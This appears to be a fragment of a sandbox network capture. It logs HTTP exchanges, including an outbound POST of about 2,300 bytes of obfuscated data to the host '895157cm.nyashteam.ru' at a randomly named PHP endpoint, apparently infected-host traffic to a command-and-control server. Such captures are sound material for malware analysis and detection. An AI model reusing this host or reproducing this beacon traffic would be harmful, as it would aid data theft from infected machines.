Dec 21, 2024 11:08:01.111877918 CET	800	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:08:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7N2dl2PxuNY6R4CHfp2lyrwnB9IV%2F62ExWzKctFOUdUi0onfKlKCTwFsPufw4hhGfRRPozEjpFLcjzyBtNHQhmm8IRvhIunOjG%2ByEkgAxVw81L4Bpj1FBzgs7hb7l0HNb6lMQe1Ejs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57118479050f49-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3926&min_rtt=1630&rtt_var=5205&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2595&delivery_rate=72981&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a Data Ascii: 4=[@W
Dec 21, 2024 11:08:01.304081917 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:08:01.556159019 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:08:01.900492907 CET	2292	OUT	Data Raw: 59 59 43 5f 5a 57 50 58 54 5d 59 5a 55 59 57 51 56 5e 5c 5e 52 57 5b 5a 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YYC_ZWPXT]YZUYWQV^\^RW[ZYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!C)<<'(>'E+<X%9=93+*03?8$!^?R2'[$.Y!'
Dec 21, 2024 11:08:02.641051054 CET	25	IN	HTTP/1.1 100 Continue